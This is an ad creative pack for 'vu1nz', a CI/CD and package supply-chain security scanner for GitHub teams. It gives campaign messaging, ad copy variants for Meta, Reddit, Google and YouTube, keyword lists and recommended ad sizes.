# vu1nz Ad Creative Pack ## Campaign Summary vu1nz adds a missing security layer for GitHub-heavy teams: CI/CD workflow scanning plus package supply-chain scanning before risky changes merge. The campaign should speak to engineers and security teams who already use Dependabot, CodeQL, Snyk, or Semgrep but still worry about workflow YAML, GitHub Actions abuse, malicious package updates, typosquats, and install-script risk. Primary CTA: Scan your public GitHub repo free. Secondary CTA: Start a 14-day free trial. ## Target Audience - DevOps engineers and platform teams responsible for GitHub Actions. - Security engineers who own software supply-chain controls. - CTOs and technical founders at GitHub-heavy teams. - Open-source maintainers who want lightweight PR checks. - Engineering managers who need a simple story for CI/CD risk. ## Messaging Pillars - Breach prevention: the weak point may be a workflow or dependency diff, not app code. - Developer utility: paste a public repo and get CI/CD findings fast. - Competitive gap: Dependabot focuses on known CVEs; CodeQL focuses on app code; vu1nz watches CI/CD and new package risk. - Fast install: install a GitHub App, no workflow YAML or secrets required. - Open-source trust: MIT licensed, auditable, forkable, and usable alongside existing tools. ## Meta Ads ### Primary Text Variations 1. Your app code is scanned. Your dependencies are watched. But what about the GitHub Actions workflow that deploys production? vu1nz scans CI/CD and package supply-chain risk before a PR merges. Scan a public repo free. 2. Dependabot and CodeQL are useful, but they do not cover every workflow and package-diff risk. vu1nz adds 17 CI/CD checks plus new-package scanning for npm, pip, cargo, gem, Go, and Composer. Start with a free public repo scan. 3. One GitHub App. CI/CD workflow findings. Package supply-chain checks. PR comments for risky changes. vu1nz helps teams catch patterns traditional scanners often miss. ### Headline Variations 1. Scan CI/CD Risk Before Merge 2. Find GitHub Actions Weak Spots 3. Add Supply-Chain Checks to PRs ### Description Variations 1. Free public repo scans. 14-day trial for teams. 2. Use alongside Dependabot, CodeQL, Snyk, and Semgrep. 3. CI/CD workflow checks plus package-diff scanning. ### Image Ad Concepts 1. Split-screen PR comment: left side "No vulnerabilities found" from a traditional tool; right side vu1nz flags "Unpinned action" or "Suspicious postinstall script." Caption: "Different scanners. Different blind spots." 2. Security stack diagram: Dependabot for known CVEs, CodeQL for app code, vu1nz for CI/CD and package-diff risk. Caption: "Close the layer your stack may not be watching." ### Short Video Concept Scene 1: A PR adds a dependency and changes a GitHub Actions workflow. Scene 2: Existing tools pass. Scene 3: vu1nz comments with a workflow risk and package warning. Scene 4: Engineer fixes before merge. End card: "Scan your public GitHub repo free." Recommended Meta sizes: 1080x1080, 1080x1350, 1200x628. ## Reddit Ads ### Promoted Post Titles 1. I built a scanner for the CI/CD risks Dependabot does not cover 2. Your GitHub Actions workflow is part of your attack surface 3. Free public repo scanner for GitHub Actions security checks ### Body Copy Variations 1. Dependabot catches known vulnerable dependencies. CodeQL catches code issues. vu1nz focuses on the CI/CD and package-diff layer: risky GitHub Actions patterns, unpinned actions, suspicious package additions, and install-script risk. Paste a public repo and get a free scan. 2. If your team ships through GitHub Actions, the workflow file is production infrastructure. vu1nz scans PRs for workflow and supply-chain patterns that often sit outside normal app-code scanning. It is MIT licensed and designed to run alongside your existing stack. 3. Not a replacement for Dependabot or CodeQL. A second layer. vu1nz checks GitHub Actions and newly added packages before merge, then posts findings in the PR so engineers can fix them in review. ### Reddit-Native Angles 1. "We already have Dependabot" angle: Respect that answer, then show the gap. "Keep it. This catches a different class of risk." 2. "CI is production" angle: Position workflow YAML as deploy infrastructure, not config trivia. ### Image Concepts 1. Minimal dark terminal card with repo input and "17 CI/CD checks complete." 2. PR review card with a vu1nz finding: "Unpinned third-party action - pin to SHA." ### Short Video/GIF Concept Cursor pastes `vercel/next.js` into scanner, result cards animate in, then cut to "Install GitHub App for PR comments." ## Google Search Ads ### Short Headlines 1. GitHub Actions Scanner 2. CI/CD Security Checks 3. Supply Chain PR Scanner 4. Scan Public Repos Free 5. Find Workflow Risk Fast 6. Dependabot Gap Coverage 7. Package Diff Security 8. PR Security Comments 9. Open Source CI Scanner 10. 14-Day Team Trial ### Long Headlines 1. Scan GitHub Actions And Package Supply-Chain Risk Before Merge 2. Add CI/CD Workflow Security Checks To Your Pull Requests 3. Use vu1nz Alongside Dependabot, CodeQL, Snyk, And Semgrep 4. Free Public Repo Scanner For GitHub Actions Security Findings ### Descriptions 1. Catch CI/CD workflow and package-diff patterns before risky PRs merge. Free public repo scans. 2. Add a missing supply-chain layer to GitHub PR review. 17 CI/CD checks plus package scanning. 3. Not a replacement for Dependabot or CodeQL. Use vu1nz to cover workflow and new-package risk. 4. Install the GitHub App, scan PRs, and get actionable comments for engineers. 5. MIT licensed and built for GitHub-heavy teams that need practical supply-chain controls. 6. Start with a public repo scan, then try team protection free for 14 days. ### Suggested Keywords - github actions security scanner - ci/cd security scanner - github workflow security - supply chain security scanner - npm malware scanner - package supply chain security - dependabot alternative - codeql alternative - pr security scanner - github app security scanner - typosquat detector - unpinned github actions ### Suggested Negative Keywords - jobs - course - certification - salary - free antivirus - generic vulnerability scanner - network scanner - pentest jobs - resume - internship ## Google Display Ads ### Headline/Body Combinations 1. Headline: CI/CD Is Attack Surface Body: Scan workflow and package-diff risk before PRs merge. 2. Headline: Dependabot Has Blind Spots Body: Keep Dependabot. Add vu1nz for CI/CD and new-package checks. 3. Headline: Scan A Public Repo Free Body: Paste owner/repo and see GitHub Actions findings in seconds. ### Banner Concepts 1. 728x90: "Your PR passed. Your workflow still has risk." Button: "Scan Free" 2. 300x250: Security stack tiles: Dependabot, CodeQL, vu1nz. Caption: "Cover the CI/CD layer." ## YouTube / Video Concepts ### YouTube Shorts / Vertical Opening: "The breach may not be in your code." Shot: PR changes workflow YAML and adds a package. Overlay: "Known CVEs? Covered. App code? Covered. CI/CD and package diff?" Shot: vu1nz PR comment flags risky pattern. End: "Scan your public GitHub repo free." ### 15-Second Pre-Roll Script "Your team scans code. Your team watches dependencies. But CI/CD is still part of the attack surface. vu1nz checks GitHub Actions workflows and new package changes before they merge. Paste a public repo for a free scan, or start a 14-day trial for PR comments." ## Image Creative Briefs - PR Comment Creative: show a realistic GitHub PR with vu1nz commenting on a workflow issue. Keep code snippets tiny, readable, and non-alarmist. - Security Stack Creative: show vu1nz as the third layer next to Dependabot and CodeQL. Avoid saying it replaces either tool. - Repo Scanner Creative: show a simple input box with `owner/repo` and result cards for "workflow risk", "package diff", and "install script." - Developer Meme-Lite Creative: "It passed CI" crossed out, replaced with "CI is what I am checking." ## Recommended Ad Sizes - Meta: 1080x1080, 1080x1350, 1200x628. - Reddit: 1200x628, 1080x1080, short GIF/video. - Google Display: 300x250, 336x280, 728x90, 970x250, 160x600, 300x600, 320x50, 320x100. - Video: 9:16 vertical, 1:1 square, 16:9 landscape. ## Best 3 Ads To Test First 1. Reddit title: "Your GitHub Actions workflow is part of your attack surface." This will resonate with technical readers and invite concrete discussion. 2. Google Search ad: "GitHub Actions Scanner" plus "Scan Public Repos Free." High intent and a low-friction CTA. 3. Meta/LinkedIn style static image: Dependabot + CodeQL + vu1nz stack diagram. It explains positioning without attacking existing tools.